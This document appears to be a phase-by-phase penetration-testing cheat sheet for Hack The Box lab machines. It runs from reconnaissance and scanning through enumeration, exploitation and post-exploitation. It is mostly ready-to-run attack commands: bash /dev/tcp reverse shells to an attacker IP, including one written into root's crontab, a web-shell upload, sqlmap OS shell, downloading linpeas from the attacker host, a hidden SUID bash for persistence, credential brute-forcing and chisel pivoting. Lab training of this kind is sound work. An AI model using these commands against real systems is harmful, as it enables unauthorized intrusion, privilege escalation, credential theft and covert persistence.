1. RECONNAISSANCE Passive info gathering - target can't detect you bash# Domain/IP lookup whois target.com nslookup target.com dig target.com ANY

Subdomain discovery

sublist3r -d target.com amass enum -d target.com

Google dorking

site:target.com filetype:pdf site:target.com inurl:admin

Social media, job postings (tech stack)

LinkedIn for employee names Job posts revealing tech (MySQL, Apache, etc.) Promising:

Leaked credentials in pastebin/github Subdomains revealing dev/staging environments Employee emails for phishing/username enumeration Tech stack from job postings

Noise:

Public marketing info Generic company data Most HTB boxes skip this phase

1. SCANNING Active probing - target sees you in logs bash# Host discovery nmap -sn 10.10.11.0/24

Port scan

nmap -p- --min-rate 5000 10.10.11.123

Service/version detection

nmap -sC -sV -p 22,80,443 10.10.11.123

OS detection

nmap -O 10.10.11.123

UDP scan

nmap -sU --top-ports 100 10.10.11.123 Promising:

Uncommon ports open (8080, 3000, 8443, 9090) Multiple web ports (80, 443, 8080) Database ports exposed (3306, 5432, 27017) Admin services (3389 RDP, 5985 WinRM, 5900 VNC)

Noise:

Only SSH on hardened Linux box All ports filtered Only standard ports with recent software

1. ENUMERATION Deep dive into each service bash# HTTP/HTTPS whatweb http://10.10.11.123 nikto -h http://10.10.11.123 curl -I http://10.10.11.123 gobuster dir -u http://10.10.11.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

SMB

enum4linux -a 10.10.11.123 smbclient -L //10.10.11.123 -N smbmap -H 10.10.11.123

FTP

ftp 10.10.11.123 # try anonymous nmap -sV -p 21 --script=ftp-anon 10.10.11.123

SMTP

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.10.11.123

SNMP

snmpwalk -v2c -c public 10.10.11.123 onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.11.123

DNS

dig axfr @10.10.11.123 target.htb

LDAP (if domain controller)

ldapsearch -x -h 10.10.11.123 -s base

NFS

showmount -e 10.10.11.123 Promising:

Anonymous FTP access with files SMB shares readable/writable Web directories expose /admin, /backup, /uploads SNMP exposes usernames, processes DNS zone transfer works (reveals all subdomains) Old versions with known exploits

Noise:

All services require authentication Empty FTP, locked SMB Only standard web pages (/css, /js) No zone transfer allowed

1. VULNERABILITY ASSESSMENT Map findings to exploits bash# Search for version exploits searchsploit apache 2.4.49 searchsploit -m 50383

CVE databases

google "service version CVE" cvedetails.com

Check default credentials

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.10.11.123

Web vulnerability scanning

burpsuite (manual testing) wfuzz for parameter fuzzing sqlmap for SQL injection

Misconfigurations

• Writable SMB shares
• Anonymous FTP upload
• Default creds (admin:admin)
• Directory listing enabled
• Exposed .git directories Promising:

Public exploit available for exact version Default credentials work SQL injection confirmed File upload accepts PHP/executable files Weak credentials (admin:password) Misconfigured permissions

Noise:

No matching exploits All exploits require authentication you don't have Services fully patched WAF blocks all attacks

1. EXPLOITATION Get initial foothold bash# Exploit public CVE python3 exploit.py 10.10.11.123

SQL injection to command execution

sqlmap -u "http://10.10.11.123/page.php?id=1" --os-shell

Upload web shell

curl -F "file=@shell.php" http://10.10.11.123/upload.php

Access: http://10.10.11.123/uploads/shell.php?cmd=id

Reverse shell (after getting RCE)

bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'

Metasploit (if you use it)

msfconsole use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOST 10.10.11.123 exploit

Listener

nc -lvnp 4444 Promising:

Shell callback received Can execute commands Web shell responsive Credential reuse successful

Noise:

Exploit fails No callback (firewall/wrong payload) Access denied Wrong architecture/OS

1. POST-EXPLOITATION Escalate, persist, pivot bash# Situational awareness whoami id hostname uname -a cat /etc/os-release ip a netstat -tulpn

Privilege escalation enumeration

sudo -l find / -perm -4000 2>/dev/null # SUID getcap -r / 2>/dev/null cat /etc/crontab systemctl list-timers

Automated enum

wget http://10.10.14.15:8000/linpeas.sh chmod +x linpeas.sh ./linpeas.sh

Credential hunting

cat /var/www/html/config.php grep -r "password" /var/www 2>/dev/null cat /home//.bash_history find / -name ".db" -o -name "*.conf" 2>/dev/null

Lateral movement

ssh user2@localhost su - user2

Use found credentials/keys

Privilege escalation

Example: SUID vim

vim -c ':!/bin/sh'

Example: writable cron

echo "bash -i >& /dev/tcp/10.10.14.15/5555 0>&1" >> /var/spool/cron/crontabs/root

Persistence (HTB usually not needed)

cp /bin/bash /tmp/.hidden chmod 4755 /tmp/.hidden

Pivoting (if multiple networks)

SSH tunnel

ssh -L 8080:internal-host:80 user@10.10.11.123

Port forwarding with chisel

./chisel server -p 8000 --reverse # attacker ./chisel client 10.10.14.15:8000 R:socks # victim Promising:

sudo rights with NOPASSWD SUID binary exploitable (GTFOBins) Readable /etc/shadow Writable cron/systemd jobs as root Credentials in config files SSH keys for other users Multiple network interfaces (pivot opportunity)

Noise:

No sudo rights Standard SUID binaries only Can't read other user files No scheduled tasks No credentials found Single network interface